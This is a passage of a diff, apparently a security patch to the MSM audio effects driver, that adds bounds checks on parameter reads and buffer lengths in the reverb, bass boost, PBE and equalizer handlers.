--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_ENABLE;
--				*updt_params++ = REVERB_ENABLE_PARAM_SZ;
--				*updt_params++ = reverb->enable_flag;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_ENABLE;
-+				*updt_params++ =
-+					REVERB_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->enable_flag;
- 			}
- 			break;
- 		case REVERB_MODE:
-@@ -283,16 +356,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->mode = *values++;
-+			reverb->mode =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_MODE val:%d\n",
- 				__func__, reverb->mode);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_MODE;
--				*updt_params++ = REVERB_MODE_PARAM_SZ;
--				*updt_params++ = reverb->mode;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_MODE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_MODE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_MODE;
-+				*updt_params++ =
-+					REVERB_MODE_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->mode;
- 			}
- 			break;
- 		case REVERB_PRESET:
-@@ -301,16 +384,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->preset = *values++;
-+			reverb->preset =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_PRESET val:%d\n",
- 					__func__, reverb->preset);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_PRESET;
--				*updt_params++ = REVERB_PRESET_PARAM_SZ;
--				*updt_params++ = reverb->preset;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_PRESET_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_PRESET", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_PRESET;
-+				*updt_params++ =
-+					REVERB_PRESET_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->preset;
- 			}
- 			break;
- 		case REVERB_WET_MIX:
-@@ -319,17 +412,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->wet_mix = *values++;
-+			reverb->wet_mix =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_WET_MIX val:%d\n",
- 				__func__, reverb->wet_mix);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_WET_MIX_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_WET_MIX", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_WET_MIX;
--				*updt_params++ = REVERB_WET_MIX_PARAM_SZ;
--				*updt_params++ = reverb->wet_mix;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_WET_MIX_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->wet_mix;
- 			}
- 			break;
- 		case REVERB_GAIN_ADJUST:
-@@ -338,17 +440,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->gain_adjust = *values++;
-+			reverb->gain_adjust =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_GAIN_ADJUST val:%d\n",
- 					__func__, reverb->gain_adjust);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_GAIN_ADJUST_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_GAIN_ADJUST", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_GAIN_ADJUST;
--				*updt_params++ = REVERB_GAIN_ADJUST_PARAM_SZ;
--				*updt_params++ = reverb->gain_adjust;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_GAIN_ADJUST_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->gain_adjust;
- 			}
- 			break;
- 		case REVERB_ROOM_LEVEL:
-@@ -357,17 +468,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->room_level = *values++;
-+			reverb->room_level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_ROOM_LEVEL val:%d\n",
- 				__func__, reverb->room_level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_ROOM_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_ROOM_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_ROOM_LEVEL;
--				*updt_params++ = REVERB_ROOM_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->room_level;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_ROOM_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->room_level;
- 			}
- 			break;
- 		case REVERB_ROOM_HF_LEVEL:
-@@ -376,17 +496,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->room_hf_level = *values++;
-+			reverb->room_hf_level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_ROOM_HF_LEVEL val%d\n",
- 				__func__, reverb->room_hf_level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_ROOM_HF_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_ROOM_HF_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_ROOM_HF_LEVEL;
--				*updt_params++ = REVERB_ROOM_HF_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->room_hf_level;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_ROOM_HF_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->room_hf_level;
- 			}
- 			break;
- 		case REVERB_DECAY_TIME:
-@@ -395,17 +524,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->decay_time = *values++;
-+			reverb->decay_time =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DECAY_TIME val:%d\n",
- 				__func__, reverb->decay_time);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DECAY_TIME_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DECAY_TIME", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DECAY_TIME;
--				*updt_params++ = REVERB_DECAY_TIME_PARAM_SZ;
--				*updt_params++ = reverb->decay_time;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DECAY_TIME_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->decay_time;
- 			}
- 			break;
- 		case REVERB_DECAY_HF_RATIO:
-@@ -414,17 +552,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->decay_hf_ratio = *values++;
-+			reverb->decay_hf_ratio =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DECAY_HF_RATIO val%d\n",
- 				__func__, reverb->decay_hf_ratio);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DECAY_HF_RATIO_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DECAY_HF_RATIO", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DECAY_HF_RATIO;
--				*updt_params++ = REVERB_DECAY_HF_RATIO_PARAM_SZ;
--				*updt_params++ = reverb->decay_hf_ratio;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DECAY_HF_RATIO_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->decay_hf_ratio;
- 			}
- 			break;
- 		case REVERB_REFLECTIONS_LEVEL:
-@@ -433,18 +580,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->reflections_level = *values++;
-+			reverb->reflections_level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_REFLECTIONS_LEVEL val:%d\n",
- 				__func__, reverb->reflections_level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ =
--				      AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL;
--				*updt_params++ =
--					REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->reflections_level;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_REFLECTIONS_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL;
-+				*updt_params++ =
-+				REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+				reverb->reflections_level;
- 			}
- 			break;
- 		case REVERB_REFLECTIONS_DELAY:
-@@ -453,18 +608,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->reflections_delay = *values++;
-+			reverb->reflections_delay =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_REFLECTIONS_DELAY val:%d\n",
- 				__func__, reverb->reflections_delay);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ =
--				      AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY;
--				*updt_params++ =
--					REVERB_REFLECTIONS_DELAY_PARAM_SZ;
--				*updt_params++ = reverb->reflections_delay;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_REFLECTIONS_DELAY_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_REFLECTIONS_DELAY", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY;
-+				*updt_params++ =
-+				REVERB_REFLECTIONS_DELAY_PARAM_SZ;
-+				*updt_params++ =
-+				reverb->reflections_delay;
- 			}
- 			break;
- 		case REVERB_LEVEL:
-@@ -473,16 +636,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->level = *values++;
-+			reverb->level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_LEVEL val:%d\n",
- 				__func__, reverb->level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_LEVEL;
--				*updt_params++ = REVERB_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->level;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_LEVEL;
-+				*updt_params++ =
-+					REVERB_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->level;
- 			}
- 			break;
- 		case REVERB_DELAY:
-@@ -491,16 +664,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->delay = *values++;
-+			reverb->delay =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s:REVERB_DELAY val:%d\n",
- 					__func__, reverb->delay);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_DELAY;
--				*updt_params++ = REVERB_DELAY_PARAM_SZ;
--				*updt_params++ = reverb->delay;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_DELAY_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DELAY", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_DELAY;
-+				*updt_params++ =
-+					REVERB_DELAY_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->delay;
- 			}
- 			break;
- 		case REVERB_DIFFUSION:
-@@ -509,17 +692,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->diffusion = *values++;
-+			reverb->diffusion =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DIFFUSION val:%d\n",
- 				__func__, reverb->diffusion);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DIFFUSION_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DIFFUSION", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DIFFUSION;
--				*updt_params++ = REVERB_DIFFUSION_PARAM_SZ;
--				*updt_params++ = reverb->diffusion;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DIFFUSION_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->diffusion;
- 			}
- 			break;
- 		case REVERB_DENSITY:
-@@ -528,17 +720,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->density = *values++;
-+			reverb->density =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DENSITY val:%d\n",
- 				__func__, reverb->density);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DENSITY_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DENSITY", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DENSITY;
--				*updt_params++ = REVERB_DENSITY_PARAM_SZ;
--				*updt_params++ = reverb->density;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DENSITY_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->density;
- 			}
- 			break;
- 		default:
-@@ -546,7 +747,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -560,15 +761,16 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 					struct bass_boost_params *bass_boost,
- 					long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -581,10 +783,14 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case BASS_BOOST_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -593,18 +799,27 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = bass_boost->enable_flag;
--			bass_boost->enable_flag = *values++;
-+			bass_boost->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: BASS_BOOST_ENABLE prev:%d new:%d\n",
- 				__func__, prev_enable_flag,
- 				bass_boost->enable_flag);
- 			if (prev_enable_flag != bass_boost->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					BASS_BOOST_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"BASS_BOOST_ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_BASS_BOOST_ENABLE;
--				*updt_params++ = BASS_BOOST_ENABLE_PARAM_SZ;
--				*updt_params++ = bass_boost->enable_flag;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					BASS_BOOST_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					bass_boost->enable_flag;
- 			}
- 			break;
- 		case BASS_BOOST_MODE:
-@@ -613,17 +828,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			bass_boost->mode = *values++;
-+			bass_boost->mode =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: BASS_BOOST_MODE val:%d\n",
- 				__func__, bass_boost->mode);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					BASS_BOOST_MODE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"BASS_BOOST_MODE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_BASS_BOOST_MODE;
--				*updt_params++ = BASS_BOOST_MODE_PARAM_SZ;
--				*updt_params++ = bass_boost->mode;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					BASS_BOOST_MODE_PARAM_SZ;
-+				*updt_params++ =
-+					bass_boost->mode;
- 			}
- 			break;
- 		case BASS_BOOST_STRENGTH:
-@@ -632,17 +856,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			bass_boost->strength = *values++;
--			pr_debug("%s: BASS_BOOST_STRENGTHi val:%d\n",
-+			bass_boost->strength =
-+				GET_NEXT(values, param_max_offset, rc);
-+			pr_debug("%s: BASS_BOOST_STRENGTH val:%d\n",
- 				__func__, bass_boost->strength);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					BASS_BOOST_STRENGTH_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"BASS_BOOST_STRENGTH", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_BASS_BOOST_STRENGTH;
--				*updt_params++ = BASS_BOOST_STRENGTH_PARAM_SZ;
--				*updt_params++ = bass_boost->strength;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					BASS_BOOST_STRENGTH_PARAM_SZ;
-+				*updt_params++ =
-+					bass_boost->strength;
- 			}
- 			break;
- 		default:
-@@ -650,7 +883,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -664,15 +897,16 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 					struct pbe_params *pbe,
- 					long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, j, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -685,10 +919,14 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case PBE_ENABLE:
- 			pr_debug("%s: PBE_ENABLE\n", __func__);
-@@ -698,15 +936,24 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = pbe->enable_flag;
--			pbe->enable_flag = *values++;
-+			pbe->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			if (prev_enable_flag != pbe->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_PBE;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					PBE_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"PBE_ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_PBE;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_PBE_ENABLE;
--				*updt_params++ = PBE_ENABLE_PARAM_SZ;
--				*updt_params++ = pbe->enable_flag;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					PBE_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					pbe->enable_flag;
- 			}
- 			break;
- 		case PBE_CONFIG:
-@@ -719,15 +966,26 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_PBE;
-+				params_length += COMMAND_PAYLOAD_SZ + length;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"PBE_PARAM", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_PBE;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_PBE_PARAM_CONFIG;
--				*updt_params++ = length;
-+				*updt_params++ =
-+					length;
- 				for (j = 0; j < length; ) {
- 					j += sizeof(*updt_params);
--					*updt_params++ = *values++;
-+					*updt_params++ =
-+						GET_NEXT(
-+						values,
-+						param_max_offset,
-+						rc);
- 				}
--				params_length += COMMAND_PAYLOAD_SZ + length;
- 			}
- 			break;
- 		default:
-@@ -735,7 +993,7 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length)
-+	if (params_length && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- invalid_config:
-@@ -747,15 +1005,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 					 struct eq_params *eq,
- 					 long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -768,11 +1027,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
--		int idx, j;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t idx;
-+		int j;
- 		switch (command_id) {
- 		case EQ_ENABLE:
